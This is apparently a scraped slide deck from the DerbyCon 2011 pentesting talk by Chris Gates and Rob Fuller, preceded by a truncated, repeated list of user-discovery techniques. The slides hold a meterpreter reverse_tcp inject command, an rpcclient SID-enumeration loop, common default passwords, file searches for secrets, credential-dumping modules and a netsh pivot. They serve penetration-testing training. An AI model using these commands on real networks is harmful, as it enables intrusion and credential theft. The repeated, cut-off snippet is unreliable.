Here are some techniques for discovering users on an internal network:- Use NetBIOS commands like net view, net group, net user to query domain controllers and local machines for user and group information. - Query Active Directory with tools like dsquery, dsget, ldapsearch to list users, groups, OUs, etc. - Use password cracking tools like ophcrack against SAM/SYSTEM registry hives or NTDS.dit files to recover hashed passwords.- Search file shares, network drives and websites for configuration files containing hard-coded credentials. - Run sniffers like Wireshark to capture authentication traffic like Kerberos tickets that may contain usernames.- Use tools like Met
Derbycon 2011
This talk is about methodologies and tools that we use or have coded that make our lives and pentest schedule a little easier, and why we do things the way we do. Of course, there will be a healthy dose of Metasploit in the mix.
Ăhnlich wie Here are some techniques for discovering users on an internal network:- Use NetBIOS commands like net view, net group, net user to query domain controllers and local machines for user and group information. - Query Active Directory with tools like dsquery, dsget, ldapsearch to list users, groups, OUs, etc. - Use password cracking tools like ophcrack against SAM/SYSTEM registry hives or NTDS.dit files to recover hashed passwords.- Search file shares, network drives and websites for configuration files containing hard-coded credentials. - Run sniffers like Wireshark to capture authentication traffic like Kerberos tickets that may contain usernames.- Use tools like Met
Ăhnlich wie Here are some techniques for discovering users on an internal network:- Use NetBIOS commands like net view, net group, net user to query domain controllers and local machines for user and group information. - Query Active Directory with tools like dsquery, dsget, ldapsearch to list users, groups, OUs, etc. - Use password cracking tools like ophcrack against SAM/SYSTEM registry hives or NTDS.dit files to recover hashed passwords.- Search file shares, network drives and websites for configuration files containing hard-coded credentials. - Run sniffers like Wireshark to capture authentication traffic like Kerberos tickets that may contain usernames.- Use tools like Met (20)
Here are some techniques for discovering users on an internal network:- Use NetBIOS commands like net view, net group, net user to query domain controllers and local machines for user and group information. - Query Active Directory with tools like dsquery, dsget, ldapsearch to list users, groups, OUs, etc. - Use password cracking tools like ophcrack against SAM/SYSTEM registry hives or NTDS.dit files to recover hashed passwords.- Search file shares, network drives and websites for configuration files containing hard-coded credentials. - Run sniffers like Wireshark to capture authentication traffic like Kerberos tickets that may contain usernames.- Use tools like Met
1. The Dirty Little Secrets
They Didnât Teach You
In Pentesting Class
DerbyCon 2011
2. meterpreter> getuid
⢠Chris Gates (CG)
â Twitterď carnal0wnage
â Blogď carnal0wnage.attackresearch.com
â Jobď Partner/Principal Security Consultant at Lares
â Affiliations ď Attack Research, Metasploit
⢠Work
⢠Previous Talks
â Attack Oracle (via web)
â wXf Web eXploitation Framework
â Open Source Information Gathering
â Attacking Oracle (via TNS)
â Client-Side Attacks
3. meterpreter> getuid
⢠Rob Fuller (mubix)
â Twitter -> mubix
â Blog -> http://www.room362.com
â Job -> Penetration Tester for Rapid7
⢠Previous Talks
â Networking for Penetration Testers
â Metasploit Framework/Pro Training for Rapid7
â Deep Magic 101
â Couch to Career in 80 hours
4. The setupâŚ
⢠We do things
⢠You do things
⢠Thereâs a better way to do
things*
⢠Because âtheyâ do them that way
⢠Or⌠now they will because you
are some of âtheyâ
⢠Use what you works for you
5. Domain Admin Or Bust
⢠Usually this means adding yourself as one
â (aka fastest way to get caught)
⢠Really just about measuringâŚ
6. Pentesting Goals
⢠Whatâs our goal?
⢠Vulnerability Driven vs. Data Driven vs. Capability
Driven pentest/goal
⢠Whatâs a *good* goal?
â Domain Admin is âA Goalâ but itâs a stupid goal.
â What makes the client money is a better goal (if you*
can identify it)
â Problems arise in actually identifying this. Whatâs
important to testers vs client vs bad guysâŚ
â Best goal, testing clientâs ability to detect & respond
to various levels of attackers
16. k, enough fiddle faddleâŚ
⢠IT Security Industry is currently focused on minimizing the
presence of vulnerabilities
⢠Consider a change in focus to what attacker
tactics/techniques you can detect and respond to
⢠Letâs call this âCapability Driven Security Assessmentsâ
⢠See my BruCon talk with Joe McCray
⢠To do this we need to ramp up post exploitation and stealth
19. Prep Work
⢠Prep work, its awesome, show it some loveâŚ
â Make your click scripts
â Update your stuff
â Have script and screen ready to go
20. How many of you have lost a shell
because _your_ connection died?
21. Screen
⢠No, not like drug screenâŚ
⢠âScreen is a full-screen window manager that
multiplexes a physical terminal between
several processes, typically interactive shells.â
22. Screen Commands and Keyboard
Shortcuts
⢠screen âS mycustomer
⢠CTRL-A then D (Detach)
⢠screen âls
⢠screen âx âd mycustomer
â attaches to âmycustomerâ screen
â detaches other âattachedâ sessions
⢠CTRL-A :multiuser on
â (Does not work on Debian based)
23. How many of you have lost a data
because your scrollback wasnât set
to be long enough?
24. Script
⢠No, not like java scriptâŚ
â Logs all your stuff
â Use it
user@ubuntu:~$ script clientname.txt
Script started, file is clientname.txt
user@ubuntu:~$ exit
exit
Script done, file is clientname.txt
user@ubuntu:~$
28. Your passwords suck
⢠One of these passwords almost always worksâŚ
password passw0rd
Password $Company1
Password123 $Company123
welcome changeme123
welcome123 p@ssw0rd
Username123 p@ssw0rd123
⢠OK back to itâŚ.
29. Nmap Scripts
⢠Obligatory nod to nmap scripts
⢠Best scripts donât fire off automatically with â-Aâ
⢠Some of the cooler scriptsâŚ
â Citrix, NFS, AFP, SNMP, LDAP ďawesome
â Database coverage
â http*
â Lots of handy stuff, some overlap with MSF aux but
some things aux doesnât have.
⢠Go See Ronâs talk on Sunday
34. MSF Auxiliary Modules
⢠Metasploit Aux modules are awesome
⢠Handle all the BS for you
⢠Uses lib/rex ==âRuby EXploitation libraryâ
â Basic library for most tasks
â Sockets, protocols, command shell interface
â SSL, SMB, HTTP, XOR, Base64, random text
â Intended to be useful outside of the framework
⢠Lib/rex ported to a ruby gem!
â Can make use of rex outside of MSF if so desired
35. MSF Auxiliary Modules
⢠Designed to help with reconnaissance
⢠Dozens of useful service scanners
⢠Simple module format, easy to use
⢠Specify THREADS for concurrency
â Keep this under 16 for native Windows
â 256 is fine on Linux
⢠Uses RHOSTS instead of RHOST
36. MSF Auxiliary Modules
⢠Uses OptAddressRange option class, similar to nmap
host specification
â 192.168.0.1,3,5-7
⢠Standard ranges
â 192.168.1-7.230
⢠Same IP on multiple subnets
â 192.168.0.*
⢠0-255
â www.metasploit.com/24
⢠0-255 for whatever this resolves to
â file:/tmp/ranges.txt
⢠Line separated list of targets
41. Exploitation
⢠We seem ok at this
alreadyâŚ
⢠Considering it coveredâŚ
⢠Open my emailâŚclick
that linkâŚyou know you
want toâŚk thx bye
43. Post Exploitation Google Docs
⢠http://www.room362.com/blog/2011/9/6/po
st-exploitation-command-lists.html
⢠Or http://bitly.com/qrbKQP
⢠Open Source (Anyone can edit them)
⢠Will always be public
â (might have to lock down the edit privs based on
defacement rate)
44. What is the best persistence method?
⢠Meterpreter?
â HTTPS
â Proâs Persistence Agent
⢠MOS_DEF?
â Thunderbird SPAM Persistence
â DNS, HTTP, HTTPS, etc
⢠CORE Agent?
⢠Wiz-bang custom binary/backdoor?
⢠RAT (probably backdoored in other ways)
48. Hooking your homies up
⢠run multi_meter_inject -pt windows/meterpreter/reverse_tcp
-mr 1.2.3.4 -p 80
⢠Multi-user functionality with armitage/msf pro
67. GOOD
⢠net group âdomain adminsâ /domain
⢠net group âdomain adminsâ /domain:DM
⢠net localgroup Administrators
⢠net group localgroup Administrators /domain
⢠net user domainadmin_username /domain
⢠net user username /domain
68. BETTER
⢠Rpcclient
â Enumerate users
#!/bin/bash
for i in {500..600}
do
rpcclient -U âuser%Password1" -W
DOMAIN 1.2.3.4 -c "lookupsids S-1-
5-21-1289870825-1602939633-
2792175544-$i
done
76. GOOD
⢠getsystem
⢠Post modules
â Keyboard layout
â Bypassuac
⢠Core Impact / Canvas ship with locals
â Honestly a big lacking area for MSF ď
79. BEST
⢠Just ask for itâŚ
⢠Explain âAskâ module
⢠Looking for the user that has the $stuff
⢠Tasklist
â tasklist /V /S $IP /U $user /P $password
for /F "skip=3 delims= " %A in ('net view') do tasklist
/V /S %A /U $user /P $password
81. BEST
⢠Just ask for itâŚ
⢠Explain âAskâ module
⢠Looking for the user that has the $stuff
⢠Tasklist
â tasklist /V /S $IP /U $user /P $password
for /F "skip=3 delims= " %A in ('net view') do tasklist
/V /S %A /U $user /P $password
83. Searching for Gold (Good)
⢠Dir /s âMy Documentsâ
⢠Dir /s âDesktopâ
⢠Dir /s *.pcf
⢠ListDrives
84. Searching for Gold (Good)
Searching for files
dir c:*password* /s
dir c:*competitor* /s
dir c:*finance* /s
dir c:*risk* /s
dir c:*assessment* /s
dir c:*.key* /s
dir c:*.vsd /s
dir c:*.pcf /s
dir c:*.ica /s
dir c:*.crt /s
dir c:*.log /s
Search in files
findstr /I /N /S /P /C:password *
findstr /I /N /S /P /C:secret *
findstr /I /N /S /P /C:confidential *
findstr /I /N /S /P /C:account *
Powershell/WMIC to do it
85. Searching for Gold (Better)
⢠Dumplinks
⢠GetFirefoxCreds
⢠GetPidginCreds
⢠Outlook, IE, Chrome, RDP
Password Extraction
â Basically the whole âcredentialsâ
post module section
⢠SharePoint
⢠Intranet.company.com
⢠Shouts to illwill, Kx499,
thelightcosine
86. Searching for Gold (Best)
⢠OpenDLP
⢠Fictionâs Database Searcher
⢠Search in Meterpreter
â Uses windows indexing i.e. outlook email
⢠Dir /s $share > filetosearchoffline.txt
â Findstr too ď
â Do what works for youâŚclick scripts rule
87. Kind dumb to stay on the initial point of entryâŚ
PIVOTING
88. ⢠Portforwarding
â Meterpreter portfwd
â Route
â Sock4a module + meterpreter session
â Pro VPN Pivot?
⢠Portproxy
â Built into Windows
â netsh interface portproxy>add v4tov4
listenport=25 connectaddress=192.168.0.100
connectport=80 protocol=tcp
⢠Legitimate Access via VPN, Term Server, Citrix, etc
89. One week isnât showing impact of internal awarenessâŚ
PERSISTENCE